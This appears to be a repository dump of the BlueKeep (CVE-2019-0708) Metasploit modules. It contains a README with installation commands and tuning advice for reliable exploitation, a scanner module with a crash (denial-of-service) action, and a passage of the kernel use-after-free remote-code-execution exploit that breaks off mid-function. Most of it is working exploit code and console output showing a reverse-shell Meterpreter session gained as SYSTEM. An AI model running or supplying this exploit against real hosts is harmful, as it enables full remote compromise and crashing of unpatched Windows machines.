├── README.md
├── cve_2019_0708_bluekeep.rb
├── cve_2019_0708_bluekeep_rce.rb
├── rdp.rb
└── rdp_scanner.rb


/README.md:
--------------------------------------------------------------------------------
 1 | # bluekeep-exploit
 2 | Bluekeep(CVE 2019-0708) exploit released
 3 | 
 4 | 
 5 | https://blog.rapid7.com/2019/09/06/initial-metasploit-exploit-module-for-bluekeep-cve-2019-0708/
 6 | 
 7 | How To use:
 8 | 
 9 | Simply make folder named rdp (for convenience) in /usr/share/metasploit-framework/modules/exploits/windows/
10 | paste this exploit file(cve_2019_0708_bluekeep_rce.rb) in the folder(rdp) and use ur metasploit skills
11 | 
12 | Also replace the files in following folders:-
13 | 
14 | rdp.rb --> /usr/share/metasploit-framework/lib/msf/core/exploit/
15 | 
16 |       cp ./rdp.rb /usr/share/metasploit-framework/lib/msf/core/exploit/rdp.rb      
17 | rdp_scanner.rb --> /usr/share/metasploit-framework/modules/auxiliary/scanner/rdp/
18 | 
19 |       cp ./rdp_scanner.rb /usr/share/metasploit-framework/modules/auxiliary/scanner/rdp/rdp_scanner.rb      
20 | cve_2019_0708_bluekeep.rb --> /usr/share/metasploit-framework/modules/auxiliary/scanner/rdp/
21 |       
22 |       cp ./cve_2019_0708_bluekeep.rb /usr/share/metasploit-framework/modules/auxiliary/scanner/rdp/cve_2019_0708_bluekeep.rb
23 | cve_2019_0708_bluekeep_rce.rb --> /usr/share/metasploit-framework/modules/exploits/windows/rdp/
24 | 
25 |       cp ./cve_2019_0708_bluekeep_rce.rb /usr/share/metasploit-framework/modules/exploits/windows/rdp/cve_2019_0708_bluekeep_rce.rb
26 | 
27 | 
28 | like:
29 | use exploit/windows/rdp/cve_2019_0708_bluekeep_rce
30 | 
31 | and then ur general concepts of setting rhosts,lhost,payload etc
32 | 
33 | Thanks to the Genius Group of People for their wonderful work
34 | 
35 | 
36 | Note:[I am not the developer of this exploit but only an ethusiast of learning exploits]
37 | 
38 | 
39 | HOW TO MAKE THE EXPLOIT WORK 100% OF THE TIME:
40 | 
41 | ############################
42 | 
43 | You have to set the GROOMSIZE as show below with different combinations and error
44 | Also my VMWARE(15) windows hardware was 2GB RAM and 1 Core processor
45 | 
46 | Conclusion setting GROOMSIZE to 50 worked as good as gold
47 | 
48 | 
49 | ############################
50 | 
51 |       msf5 exploit(windows/rdp/cve_2019_0708_bluekeep_rce) > set GROOMSIZE 100
52 |      GROOMSIZE => 100
53 |      msf5 exploit(windows/rdp/cve_2019_0708_bluekeep_rce) > run
54 | 
55 |      [*] Started reverse TCP handler on 192.168.43.84:4444 
56 |      [*] 192.168.43.137:3389   - Detected RDP on 192.168.43.137:3389   (Windows version: 6.1.7601) (Requires NLA: No)
57 |      [+] 192.168.43.137:3389   - The target is vulnerable.
58 |      [*] 192.168.43.137:3389 - Using CHUNK grooming strategy. Size 100MB, target address 0xfffffa801f000000, Channel count 1.
59 |      [*] 192.168.43.137:3389 - Surfing channels ...
60 |      [*] 192.168.43.137:3389 - Lobbing eggs ...
61 |      [*] 192.168.43.137:3389 - Forcing the USE of FREE'd object ...
62 |      [*] Exploit completed, but no session was created.
63 |      msf5 exploit(windows/rdp/cve_2019_0708_bluekeep_rce) > set GROOMSIZE 150
64 |      GROOMSIZE => 150
65 |      msf5 exploit(windows/rdp/cve_2019_0708_bluekeep_rce) > run
66 | 
67 |      [*] Started reverse TCP handler on 192.168.43.84:4444 
68 |      [*] 192.168.43.137:3389   - Detected RDP on 192.168.43.137:3389   (Windows version: 6.1.7601) (Requires NLA: No)
69 |      [+] 192.168.43.137:3389   - The target is vulnerable.
70 |      [*] 192.168.43.137:3389 - Using CHUNK grooming strategy. Size 150MB, target address 0xfffffa8022200000, Channel count 1.
71 |      [*] 192.168.43.137:3389 - Surfing channels ...
72 |      [*] 192.168.43.137:3389 - Lobbing eggs ...
73 |      [-] 192.168.43.137:3389 - Exploit failed [disconnected]: Errno::ECONNRESET Connection reset by peer
74 |      [*] Exploit completed, but no session was created.
75 |      msf5 exploit(windows/rdp/cve_2019_0708_bluekeep_rce) > set GROOMSIZE 50
76 |      GROOMSIZE => 50
77 |      msf5 exploit(windows/rdp/cve_2019_0708_bluekeep_rce) > run
78 | 
79 |      [*] Started reverse TCP handler on 192.168.43.84:4444 
80 |      [*] 192.168.43.137:3389   - Detected RDP on 192.168.43.137:3389   (Windows version: 6.1.7601) (Requires NLA: No)
81 |      [+] 192.168.43.137:3389   - The target is vulnerable.
82 |      [*] 192.168.43.137:3389 - Using CHUNK grooming strategy. Size 50MB, target address 0xfffffa801be00000, Channel count 1.
83 |      [*] 192.168.43.137:3389 - Surfing channels ...
84 |      [*] 192.168.43.137:3389 - Lobbing eggs ...
85 |      [*] 192.168.43.137:3389 - Forcing the USE of FREE'd object ...
86 |      [*] Sending stage (206403 bytes) to 192.168.43.137
87 |      [*] Meterpreter session 2 opened (192.168.43.84:4444 -> 192.168.43.137:51854) at 2019-09-10 22:59:44 +0530
88 | 
89 |      meterpreter > getuid
90 |      Server username: NT AUTHORITY\SYSTEM
91 |      meterpreter > 
92 | 
93 |   
94 | 


--------------------------------------------------------------------------------
/cve_2019_0708_bluekeep.rb:
--------------------------------------------------------------------------------
  1 | ##
  2 | # This module requires Metasploit: https://metasploit.com/download
  3 | # Current source: https://github.com/rapid7/metasploit-framework
  4 | ##
  5 | 
  6 | class MetasploitModule < Msf::Auxiliary
  7 |   include Msf::Exploit::Remote::RDP
  8 |   include Msf::Auxiliary::Scanner
  9 |   include Msf::Auxiliary::Report
 10 | 
 11 |   def initialize(info = {})
 12 |     super(update_info(info,
 13 |       'Name'           => 'CVE-2019-0708 BlueKeep Microsoft Remote Desktop RCE Check',
 14 |       'Description'    => %q{
 15 |         This module checks a range of hosts for the CVE-2019-0708 vulnerability
 16 |         by binding the MS_T120 channel outside of its normal slot and sending
 17 |         non-DoS packets which respond differently on patched and vulnerable hosts.
 18 |         It can optionally trigger the DoS vulnerability.
 19 |       },
 20 |       'Author'         =>
 21 |         [
 22 |           'National Cyber Security Centre', # Discovery
 23 |           'JaGoTu',                         # Module
 24 |           'zerosum0x0',                     # Module
 25 |           'Tom Sellers'                     # TLS support, packet documenentation, DoS implementation
 26 |         ],
 27 |       'References'     =>
 28 |         [
 29 |           [ 'CVE', '2019-0708' ],
 30 |           [ 'URL', 'https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2019-0708' ]
 31 |         ],
 32 |       'DisclosureDate' => '2019-05-14',
 33 |       'License'        => MSF_LICENSE,
 34 |       "Actions" => [
 35 |         ["Scan", "Description" => "Scan for exploitable targets"],
 36 |         ["Crash", "Description" => "Trigger denial of service vulnerability"],
 37 |       ],
 38 |       "DefaultAction" => "Scan",
 39 |       'Notes'          =>
 40 |         {
 41 |           'Stability' => [ CRASH_SAFE ],
 42 |           'AKA'       => ['BlueKeep']
 43 |         }
 44 |     ))
 45 |   end
 46 | 
 47 |   def report_goods
 48 |     report_vuln(
 49 |       :host  => rhost,
 50 |       :port  => rport,
 51 |       :proto => 'tcp',
 52 |       :name  => self.name,
 53 |       :info  => 'Behavior indicates a missing Microsoft Windows RDP patch for CVE-2019-0708',
 54 |       :refs  => self.references
 55 |     )
 56 |   end
 57 | 
 58 |   def run_host(ip)
 59 |     # Allow the run command to call the check command
 60 | 
 61 |     status = check_host(ip)
 62 |     if status == Exploit::CheckCode::Vulnerable
 63 |       print_good(status[1].to_s)
 64 |     elsif status == Exploit::CheckCode::Unsupported  # used to display custom msg error
 65 |       status = Exploit::CheckCode::Safe
 66 |       print_status("The target service is not running or refused our connection.")
 67 |     else
 68 |       print_status(status[1].to_s)
 69 |     end
 70 | 
 71 |     status
 72 |   end
 73 | 
 74 |   def rdp_reachable
 75 |     rdp_connect
 76 |     rdp_disconnect
 77 |     return true
 78 |   rescue Rex::ConnectionRefused
 79 |     return false
 80 |   rescue Rex::ConnectionTimeout
 81 |     return false
 82 |   end
 83 | 
 84 |   def check_host(_ip)
 85 |     # The check command will call this method instead of run_host
 86 |     status = Exploit::CheckCode::Unknown
 87 | 
 88 |     begin
 89 |       begin
 90 |         rdp_connect
 91 |       rescue ::Errno::ETIMEDOUT, Rex::HostUnreachable, Rex::ConnectionTimeout, Rex::ConnectionRefused, ::Timeout::Error, ::EOFError
 92 |         return Exploit::CheckCode::Unsupported # used to display custom msg error
 93 |       end
 94 | 
 95 |       status = check_rdp_vuln
 96 |     rescue Rex::AddressInUse, ::Errno::ETIMEDOUT, Rex::HostUnreachable, Rex::ConnectionTimeout, Rex::ConnectionRefused, ::Timeout::Error, ::EOFError, ::TypeError => e
 97 |       bt = e.backtrace.join("\n")
 98 |       vprint_error("Unexpected error: #{e.message}")
 99 |       vprint_line(bt)
100 |       elog("#{e.message}\n#{bt}")
101 |     rescue RdpCommunicationError
102 |       vprint_error("Error communicating RDP protocol.")
103 |       status = Exploit::CheckCode::Unknown
104 |     rescue Errno::ECONNRESET
105 |       vprint_error("Connection reset")
106 |     rescue => e
107 |       bt = e.backtrace.join("\n")
108 |       vprint_error("Unexpected error: #{e.message}")
109 |       vprint_line(bt)
110 |       elog("#{e.message}\n#{bt}")
111 |     ensure
112 |       rdp_disconnect
113 |     end
114 | 
115 |     status
116 |   end
117 | 
118 |   def check_for_patch
119 |     begin
120 |       6.times do
121 |         _res = rdp_recv
122 |       end
123 |     rescue RdpCommunicationError
124 |       # we don't care
125 |     end
126 | 
127 |     # The loop below sends Virtual Channel PDUs (2.2.6.1) that vary in length
128 |     # The arch governs which of the packets triggers the desired response
129 |     # which is an MCS Disconnect Provider Ultimatum or a timeout.
130 | 
131 |     # Disconnect Provider message of a valid size for each platform
132 |     # has proven to be safe to send as part of the vulnerability check.
133 |     x86_string = "00000000020000000000000000000000"
134 |     x64_string = "0000000000000000020000000000000000000000000000000000000000000000"
135 | 
136 |     if action.name == 'Crash'
137 |       vprint_status("Sending denial of service payloads")
138 |       # Length and chars are arbitrary but total length needs to be longer than
139 |       # 16 for x86 and 32 for x64. Making the payload too long seems to cause
140 |       # the DoS to fail. Note that sometimes the DoS seems to fail. Increasing
141 |       # the payload size and sending more of them doesn't seem to improve the
142 |       # reliability. It *seems* to happen more often on x64, I haven't seen it
143 |       # fail against x86. Repeated attempts will generally trigger the DoS.
144 |       x86_string += "FF" * 1
145 |       x64_string += "FF" * 2
146 |     else
147 |       vprint_status("Sending patch check payloads")
148 |     end
149 | 
150 |     chan_flags = RDPConstants::CHAN_FLAG_FIRST | RDPConstants::CHAN_FLAG_LAST
151 |     channel_id = [1005].pack('S>')
152 |     x86_packet = rdp_build_pkt(build_virtual_channel_pdu(chan_flags, [x86_string].pack("H*")), channel_id)
153 | 
154 |     x64_packet = rdp_build_pkt(build_virtual_channel_pdu(chan_flags, [x64_string].pack("H*")), channel_id)
155 | 
156 |     6.times do
157 |       rdp_send(x86_packet)
158 |       rdp_send(x64_packet)
159 | 
160 |       # A single pass should be sufficient to cause DoS
161 |       if action.name == 'Crash'
162 |         sleep(1)
163 |         rdp_disconnect
164 | 
165 |         sleep(5)
166 |         if rdp_reachable
167 |           print_error("Target doesn't appear to have been crashed. Consider retrying.")
168 |           return Exploit::CheckCode::Unknown
169 |         else
170 |           print_good("Target service appears to have been successfully crashed.")
171 |           return Exploit::CheckCode::Vulnerable
172 |         end
173 |       end
174 | 
175 |       # Quick check for the Ultimatum PDU
176 |       begin
177 |         res = rdp_recv(-1, 1)
178 |       rescue EOFError
179 |         # we don't care
180 |       end
181 |       return Exploit::CheckCode::Vulnerable if res&.include?(["0300000902f0802180"].pack("H*"))
182 | 
183 |       # Slow check for Ultimatum PDU. If it doesn't respond in a timely
184 |       # manner then the host is likely patched.
185 |       begin
186 |         4.times do
187 |           res = rdp_recv
188 |           # 0x2180 = MCS Disconnect Provider Ultimatum PDU - 2.2.2.3
189 |           if res.include?(["0300000902f0802180"].pack("H*"))
190 |             return Exploit::CheckCode::Vulnerable
191 |           end
192 |         end
193 |       rescue RdpCommunicationError
194 |         # we don't care
195 |       end
196 |     end
197 | 
198 |     Exploit::CheckCode::Safe
199 |   end
200 | 
201 |   def check_rdp_vuln
202 |     # check if rdp is open
203 |     is_rdp, version_info = rdp_fingerprint
204 |     unless is_rdp
205 |       vprint_status "Could not connect to RDP service."
206 |       return Exploit::CheckCode::Unknown
207 |     end
208 |     rdp_disconnect
209 |     rdp_connect
210 |     is_rdp, server_selected_proto = rdp_check_protocol
211 | 
212 |     requires_nla = [RDPConstants::PROTOCOL_HYBRID, RDPConstants::PROTOCOL_HYBRID_EX].include? server_selected_proto
213 |     product_version = (version_info && version_info[:product_version]) ? version_info[:product_version] : 'N/A'
214 |     info = "Detected RDP on #{peer} (Windows version: #{product_version})"
215 | 
216 |     service_info = "Requires NLA: #{(!version_info[:product_version].nil? && requires_nla) ? 'Yes' : 'No'}"
217 |     info << " (#{service_info})"
218 | 
219 |     print_status(info)
220 | 
221 |     if requires_nla
222 |       vprint_status("Server requires NLA (CredSSP) security which mitigates this vulnerability.")
223 |       return Exploit::CheckCode::Safe
224 |     end
225 | 
226 |     chans = [
227 |       ['cliprdr', RDPConstants::CHAN_INITIALIZED | RDPConstants::CHAN_ENCRYPT_RDP | RDPConstants::CHAN_COMPRESS_RDP | RDPConstants::CHAN_SHOW_PROTOCOL],
228 |       ['MS_T120',   RDPConstants::CHAN_INITIALIZED | RDPConstants::CHAN_COMPRESS_RDP],
229 |       ['rdpsnd',  RDPConstants::CHAN_INITIALIZED | RDPConstants::CHAN_ENCRYPT_RDP],
230 |       ['snddbg',  RDPConstants::CHAN_INITIALIZED | RDPConstants::CHAN_ENCRYPT_RDP],
231 |       ['rdpdr',   RDPConstants::CHAN_INITIALIZED | RDPConstants::CHAN_COMPRESS_RDP],
232 |     ]
233 | 
234 |     success = rdp_negotiate_security(chans, server_selected_proto)
235 |     return Exploit::CheckCode::Unknown unless success
236 | 
237 |     rdp_establish_session
238 | 
239 |     result = check_for_patch
240 | 
241 |     if result == Exploit::CheckCode::Vulnerable
242 |       report_goods
243 |     end
244 | 
245 |     # Can't determine, but at least we know the service is running
246 |     result
247 |   end
248 | 
249 | end
250 | 


--------------------------------------------------------------------------------
/cve_2019_0708_bluekeep_rce.rb:
--------------------------------------------------------------------------------
   1 | ##
   2 | # This module requires Metasploit: https://metasploit.com/download
   3 | # Current source: https://github.com/rapid7/metasploit-framework
   4 | ##
   5 | 
   6 | #  Exploitation and Caveats from zerosum0x0:
   7 | #
   8 | #    1. Register with channel MS_T120 (and others such as RDPDR/RDPSND) nominally.
   9 | #    2. Perform a full RDP handshake, I like to wait for RDPDR handshake too (code in the .py)
  10 | #    3. Free MS_T120 with the DisconnectProviderIndication message to MS_T120.
  11 | #    4. RDP has chunked messages, so we use this to groom.
  12 | #       a. Chunked messaging ONLY works properly when sent to RDPSND/MS_T120.
  13 | #       b. However, on 7+, MS_T120 will not work and you have to use RDPSND.
  14 | #           i. RDPSND only works when
  15 | #              HKLM\SYSTEM\CurrentControlSet\Control\TerminalServer\Winstations\RDP-Tcp\fDisableCam = 0
  16 | #           ii. This registry key is not a default setting for server 2008 R2.
  17 | #              We should use alternate groom channels or at least detect the
  18 | #              channel in advance.
  19 | #    5. Use chunked grooming to fit new data in the freed channel, account for
  20 | #       the allocation header size (like 0x38 I think?). At offset 0x100? is where
  21 | #       the "call [rax]" gadget will get its pointer from.
  22 | #       a. The NonPagedPool (NPP) starts at a fixed address on XP-7
  23 | #           i. Hot-swap memory is another problem because, with certain VMWare and
  24 | #           Hyper-V setups, the OS allocates a buncha PTE stuff before the NPP
  25 | #           start. This can be anywhere from 100 mb to gigabytes of offset
  26 | #           before the NPP start.
  27 | #       b. Set offset 0x100 to NPPStart+SizeOfGroomInMB
  28 | #       c. Groom chunk the shellcode, at *(NPPStart+SizeOfGroomInMB) you need
  29 | #          [NPPStart+SizeOfGroomInMB+8...payload]... because "call [rax]" is an
  30 | #          indirect call
  31 | #       d. We are limited to 0x400 payloads by channel chunk max size. My
  32 | #          current shellcode is a twin shellcode with eggfinders. I spam the
  33 | #          kernel payload and user payload, and if user payload is called first it
  34 | #          will egghunt for the kernel payload.
  35 | #    6. After channel hole is filled and the NPP is spammed up with shellcode,
  36 | #       trigger the free by closing the socket.
  37 | #
  38 | #    TODO:
  39 | #    * Detect OS specifics / obtain memory leak to determine NPP start address.
  40 | #    * Write the XP/2003 portions grooming MS_T120.
  41 | #    * Detect if RDPSND grooming is working or not?
  42 | #    * Expand channels besides RDPSND/MS_T120 for grooming.
  43 | #        See https://unit42.paloaltonetworks.com/exploitation-of-windows-cve-2019-0708-bluekeep-three-ways-to-write-data-into-the-kernel-with-rdp-pdu/
  44 | #
  45 | #    https://github.com/0xeb-bp/bluekeep .. this repo has code for grooming
  46 | #    MS_T120 on XP... should be same process as the RDPSND
  47 | 
  48 | class MetasploitModule < Msf::Exploit::Remote
  49 | 
  50 |   Rank = ManualRanking
  51 | 
  52 |   USERMODE_EGG = 0xb00dac0fefe31337
  53 |   KERNELMODE_EGG = 0xb00dac0fefe42069
  54 | 
  55 |   CHUNK_SIZE = 0x400
  56 |   HEADER_SIZE = 0x48
  57 | 
  58 |   include Msf::Exploit::Remote::RDP
  59 |   include Msf::Exploit::Remote::CheckScanner
  60 | 
  61 |   def initialize(info = {})
  62 |     super(update_info(info,
  63 |       'Name'           => 'CVE-2019-0708 BlueKeep RDP Remote Windows Kernel Use After Free',
  64 |       'Description'    => %q(
  65 |         The RDP termdd.sys driver improperly handles binds to internal-only channel MS_T120,
  66 |         allowing a malformed Disconnect Provider Indication message to cause use-after-free.
  67 |         With a controllable data/size remote nonpaged pool spray, an indirect call gadget of
  68 |         the freed channel is used to achieve arbitrary code execution.
  69 |       ),
  70 |       'Author' =>
  71 |       [
  72 |         'Sean Dillon <sean.dillon@risksense.com>',  # @zerosum0x0 - Original exploit
  73 |         'Ryan Hanson',                              # @ryHanson - Original exploit
  74 |         'OJ Reeves <oj@beyondbinary.io>',           # @TheColonial - Metasploit module
  75 |         'Brent Cook <bcook@rapid7.com>',            # @busterbcook - Assembly whisperer
  76 |       ],
  77 |       'License' => MSF_LICENSE,
  78 |       'References' =>
  79 |         [
  80 |           ['CVE', '2019-0708'],
  81 |           ['URL', 'https://github.com/zerosum0x0/CVE-2019-0708'],
  82 |         ],
  83 |       'DefaultOptions' =>
  84 |         {
  85 |           'EXITFUNC' => 'thread',
  86 |           'WfsDelay' => 5,
  87 |           'RDP_CLIENT_NAME' => 'ethdev',
  88 |           'CheckScanner' => 'auxiliary/scanner/rdp/cve_2019_0708_bluekeep'
  89 |         },
  90 |       'Privileged' => true,
  91 |       'Payload' =>
  92 |         {
  93 |           'Space' => CHUNK_SIZE - HEADER_SIZE,
  94 |           'EncoderType' => Msf::Encoder::Type::Raw,
  95 |         },
  96 |       'Platform' => 'win',
  97 |       'Targets' =>
  98 |         [
  99 |           [
 100 |             'Automatic targeting via fingerprinting',
 101 |             {
 102 |               'Arch' => [ARCH_X64],
 103 |               'FingerprintOnly' => true
 104 |             },
 105 |           ],
 106 |           #
 107 |           #
 108 |           # Windows 2008 R2 requires the following registry change from default:
 109 |           #
 110 |           # [HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Terminal Server\WinStations\rdpwd]
 111 |           # "fDisableCam"=dword:00000000
 112 |           #
 113 |           [
 114 |             'Windows 7 SP1 / 2008 R2 (6.1.7601 x64)',
 115 |             {
 116 |               'Platform' => 'win',
 117 |               'Arch' => [ARCH_X64],
 118 |               'GROOMBASE' => 0xfffffa8003800000,
 119 |               'GROOMSIZE' => 100
 120 |             }
 121 |           ],
 122 |           [
 123 |             # This works with Virtualbox 6
 124 |             'Windows 7 SP1 / 2008 R2 (6.1.7601 x64 - Virtualbox 6)',
 125 |             {
 126 |               'Platform' => 'win',
 127 |               'Arch' => [ARCH_X64],
 128 |               'GROOMBASE' => 0xfffffa8002407000
 129 |             }
 130 |           ],
 131 |           [
 132 |             # This address works on VMWare 14
 133 |             'Windows 7 SP1 / 2008 R2 (6.1.7601 x64 - VMWare 14)',
 134 |             {
 135 |               'Platform' => 'win',
 136 |               'Arch' => [ARCH_X64],
 137 |               'GROOMBASE' => 0xfffffa8030c00000
 138 |             }
 139 |           ],
 140 |           [
 141 |             # This address works on VMWare 15
 142 |             'Windows 7 SP1 / 2008 R2 (6.1.7601 x64 - VMWare 15)',
 143 |             {
 144 |               'Platform' => 'win',
 145 |               'Arch' => [ARCH_X64],
 146 |               'GROOMBASE' => 0xfffffa8018C00000
 147 |             }
 148 |           ],
 149 |           [
 150 |             # This address works on VMWare 15.1
 151 |             'Windows 7 SP1 / 2008 R2 (6.1.7601 x64 - VMWare 15.1)',
 152 |             {
 153 |               'Platform' => 'win',
 154 |               'Arch' => [ARCH_X64],
 155 |               'GROOMBASE' => 0xfffffa8018c08000
 156 |             }
 157 |           ],
 158 |           [
 159 |             'Windows 7 SP1 / 2008 R2 (6.1.7601 x64 - Hyper-V)',
 160 |             {
 161 |               'Platform' => 'win',
 162 |               'Arch' => [ARCH_X64],
 163 |               'GROOMBASE' => 0xfffffa8102407000
 164 |             }
 165 |           ],
 166 |           [
 167 |             'Windows 7 SP1 / 2008 R2 (6.1.7601 x64 - AWS)',
 168 |             {
 169 |               'Platform' => 'win',
 170 |               'Arch' => [ARCH_X64],
 171 |               'GROOMBASE' => 0xfffffa8018c08000
 172 |             }
 173 |           ],
 174 |         ],
 175 |       'DefaultTarget' => 0,
 176 |       'DisclosureDate' => 'May 14 2019',
 177 |       'Notes' =>
 178 |         {
 179 |           'AKA' => ['Bluekeep']
 180 |         }
 181 |     ))
 182 | 
 183 |     register_advanced_options(
 184 |       [
 185 |         OptBool.new('ForceExploit', [false, 'Override check result', false]),
 186 |         OptInt.new('GROOMSIZE', [true, 'Size of the groom in MB', 250]),
 187 |         OptEnum.new('GROOMCHANNEL', [true, 'Channel to use for grooming', 'RDPSND', ['RDPSND', 'MS_T120']]),
 188 |         OptInt.new('GROOMCHANNELCOUNT', [true, 'Number of channels to groom', 1]),
 189 |       ]
 190 |     )
 191 |   end
 192 | 
 193 |   def exploit
 194 |     unless check == CheckCode::Vulnerable || datastore['ForceExploit']
 195 |       fail_with(Failure::NotVulnerable, 'Set ForceExploit to override')
 196 |     end
 197 | 
 198 |     if target['FingerprintOnly']
 199 |       fail_with(Msf::Module::Failure::BadConfig, 'Set the most appropriate target manually')
 200 |     end
 201 | 
 202 |     begin
 203 |       rdp_connect
 204 |     rescue ::Errno::ETIMEDOUT, Rex::HostUnreachable, Rex::ConnectionTimeout, Rex::ConnectionRefused, ::Timeout::Error, ::EOFError
 205 |       fail_with(Msf::Module::Failure::Unreachable, 'Unable to connect to RDP service')
 206 |     end
 207 | 
 208 |     is_rdp, server_selected_proto = rdp_check_protocol
 209 |     unless is_rdp
 210 |       fail_with(Msf::Module::Failure::Unreachable, 'Unable to connect to RDP service')
 211 |     end
 212 | 
 213 |     # We don't currently support NLA in the mixin or the exploit. However, if we have valid creds, NLA shouldn't stop us
 214 |     # from exploiting the target.
 215 |     if [RDPConstants::PROTOCOL_HYBRID, RDPConstants::PROTOCOL_HYBRID_EX].include?(server_selected_proto)
 216 |       fail_with(Msf::Module::Failure::BadConfig, 'Server requires NLA (CredSSP) security which mitigates this vulnerability.')
 217 |     end
 218 | 
 219 |     chans = [
 220 |       ['rdpdr', RDPConstants::CHAN_INITIALIZED | RDPConstants::CHAN_ENCRYPT_RDP | RDPConstants::CHAN_COMPRESS_RDP],
 221 |       [datastore['GROOMCHANNEL'], RDPConstants::CHAN_INITIALIZED | RDPConstants::CHAN_ENCRYPT_RDP],
 222 |       [datastore['GROOMCHANNEL'], RDPConstants::CHAN_INITIALIZED | RDPConstants::CHAN_ENCRYPT_RDP],
 223 |       ['MS_XXX0', RDPConstants::CHAN_INITIALIZED | RDPConstants::CHAN_ENCRYPT_RDP | RDPConstants::CHAN_COMPRESS_RDP | RDPConstants::CHAN_SHOW_PROTOCOL],
 224 |       ['MS_XXX1', RDPConstants::CHAN_INITIALIZED | RDPConstants::CHAN_ENCRYPT_RDP | RDPConstants::CHAN_COMPRESS_RDP | RDPConstants::CHAN_SHOW_PROTOCOL],
 225 |       ['MS_XXX2', RDPConstants::CHAN_INITIALIZED | RDPConstants::CHAN_ENCRYPT_RDP | RDPConstants::CHAN_COMPRESS_RDP | RDPConstants::CHAN_SHOW_PROTOCOL],
 226 |       ['MS_XXX3', RDPConstants::CHAN_INITIALIZED | RDPConstants::CHAN_ENCRYPT_RDP | RDPConstants::CHAN_COMPRESS_RDP | RDPConstants::CHAN_SHOW_PROTOCOL],
 227 |       ['MS_XXX4', RDPConstants::CHAN_INITIALIZED | RDPConstants::CHAN_ENCRYPT_RDP | RDPConstants::CHAN_COMPRESS_RDP | RDPConstants::CHAN_SHOW_PROTOCOL],
 228 |       ['MS_XXX5', RDPConstants::CHAN_INITIALIZED | RDPConstants::CHAN_ENCRYPT_RDP | RDPConstants::CHAN_COMPRESS_RDP | RDPConstants::CHAN_SHOW_PROTOCOL],
 229 |       ['MS_T120', RDPConstants::CHAN_INITIALIZED | RDPConstants::CHAN_ENCRYPT_RDP | RDPConstants::CHAN_COMPRESS_RDP | RDPConstants::CHAN_SHOW_PROTOCOL],
 230 |     ]
 231 | 
 232 |     @mst120_chan_id = 1004 + chans.length - 1
 233 | 
 234 |     unless rdp_negotiate_security(chans, server_selected_proto)
 235 |       fail_with(Msf::Module::Failure::Unknown, 'Negotiation of security failed.')
 236 |     end
 237 | 
 238 |     rdp_establish_session
 239 | 
 240 |     rdp_dispatch_loop
 241 |   end
 242 | 
 243 | private
 244 | 
 245 |   # This function is invoked when the PAKID_CORE_CLIENTID_CONFIRM message is
 246 |   # received on a channel, and this is when we need to kick off our exploit.
 247 |   def rdp_on_core_client_id_confirm(pkt, user, chan_id, flags, data)
 248 |     # We have to do the default behaviour first.
 249 |     super(pkt, user, chan_id, flags, data)
 250 | 
 251 |     groom_size = datastore['GROOMSIZE']
 252 |     pool_addr = target['GROOMBASE'] + (CHUNK_SIZE * 1024 * groom_size)
 253 |     groom_chan_count = datastore['GROOMCHANNELCOUNT']
 254 | 
 255 |     payloads = create_payloads(pool_addr)
 256 | 
 257 |     print_status("Using CHUNK grooming strategy. Size #{groom_size}MB, target address 0x#{pool_addr.to_s(16)}, Channel count #{groom_chan_count}.")
 258 | 
 259 |     target_channel_id = chan_id + 1
 260 | 
 261 |     spray_buffer = create_exploit_channel_buffer(pool_addr)
 262 |     spray_channel = rdp_create_channel_msg(self.rdp_user_id, target_channel_id, spray_buffer, 0, 0xFFFFFFF)
 263 |     free_trigger = spray_channel * 20 + create_free_trigger(self.rdp_user_id, @mst120_chan_id) + spray_channel * 80
 264 | 
 265 |     print_status("Surfing channels ...")
 266 |     rdp_send(spray_channel * 1024)
 267 |     rdp_send(free_trigger)
 268 | 
 269 |     chan_surf_size = 0x421
 270 |     spray_packets = (chan_surf_size / spray_channel.length) + [1, chan_surf_size % spray_channel.length].min
 271 |     chan_surf_packet = spray_channel * spray_packets
 272 |     chan_surf_count  = chan_surf_size / spray_packets
 273 | 
 274 |     chan_surf_count.times do
 275 |       rdp_send(chan_surf_packet)
 276 |     end
 277 | 
 278 |     print_status("Lobbing eggs ...")
 279 | 
 280 |     groom_mb = groom_size * 1024 / payloads.length
 281 | 
 282 |     groom_mb.times do
 283 |       tpkts = ''
 284 |       for c in 0..groom_chan_count
 285 |         payloads.each do |p|
 286 |           tpkts += rdp_create_channel_msg(self.rdp_user_id, target_channel_id + c, p, 0, 0xFFFFFFF)
 287 |         end
 288 |       end
 289 |       rdp_send(tpkts)
 290 |     end
 291 | 
 292 |     # Terminating and disconnecting forces the USE
 293 |     print_status("Forcing the USE of FREE'd object ...")
 294 |     rdp_terminate
 295 |     rdp_disconnect
 296 |   end
 297 | 
 298 |   # Helper function to create the kernel mode payload and the usermode payload with
 299 |   # the egg hunter prefix.
 300 |   def create_payloads(pool_address)
 301 |     begin
 302 |       [kernel_mode_payload, user_mode_payload].map { |p|
 303 |         [
 304 |           pool_address + HEADER_SIZE + 0x10, # indirect call gadget, over this pointer + egg
 305 |           p
 306 |         ].pack('<Qa*').ljust(CHUNK_SIZE - HEADER_SIZE, "\x00")
 307 |       }
 308 |     rescue => ex
 309 |       print_error("#{ex.backtrace.join("\n")}: #{ex.message} (#{ex.class})")
 310 |     end
 311 |   end
 312 | 
 313 |   def assemble_with_fixups(asm)
 314 |     # Rewrite all instructions of form 'lea reg, [rel label]' as relative
 315 |     # offsets for the instruction pointer, since metasm's 'ModRM' parser does
 316 |     # not grok that syntax.
 317 |     lea_rel = /lea+\s(?<dest>\w{2,3}),*\s\[rel+\s(?<label>[a-zA-Z_].*)\]/
 318 |     asm.gsub!(lea_rel) do |match|
 319 |       match = "lea #{$1}, [rip + #{$2}]"
 320 |     end
 321 | 
 322 |     # metasm encodes all rep instructions as repnz
 323 |     # https://github.com/jjyg/metasm/pull/40
 324 |     asm.gsub!(/rep+\smovsb/, 'db 0xf3, 0xa4')
 325 | 
 326 |     encoded = Metasm::Shellcode.assemble(Metasm::X64.new, asm).encoded
 327 | 
 328 |     # Fixup above rewritten instructions with the relative label offsets
 329 |     encoded.reloc.each do |offset, reloc|
 330 |       target = reloc.target.to_s
 331 |       if encoded.export.key?(target)
 332 |         # Note: this assumes the address we're fixing up is at the end of the
 333 |         # instruction. This holds for 'lea' but if there are other fixups
 334 |         # later, this might need to change to account for specific instruction
 335 |         # encodings
 336 |         if reloc.type == :i32
 337 |           instr_offset = offset + 4
 338 |         elsif reloc.type == :i16
 339 |           instr_offset = offset + 2
 340 |         end
 341 |         encoded.fixup(target => encoded.export[target] - instr_offset)
 342 |       else
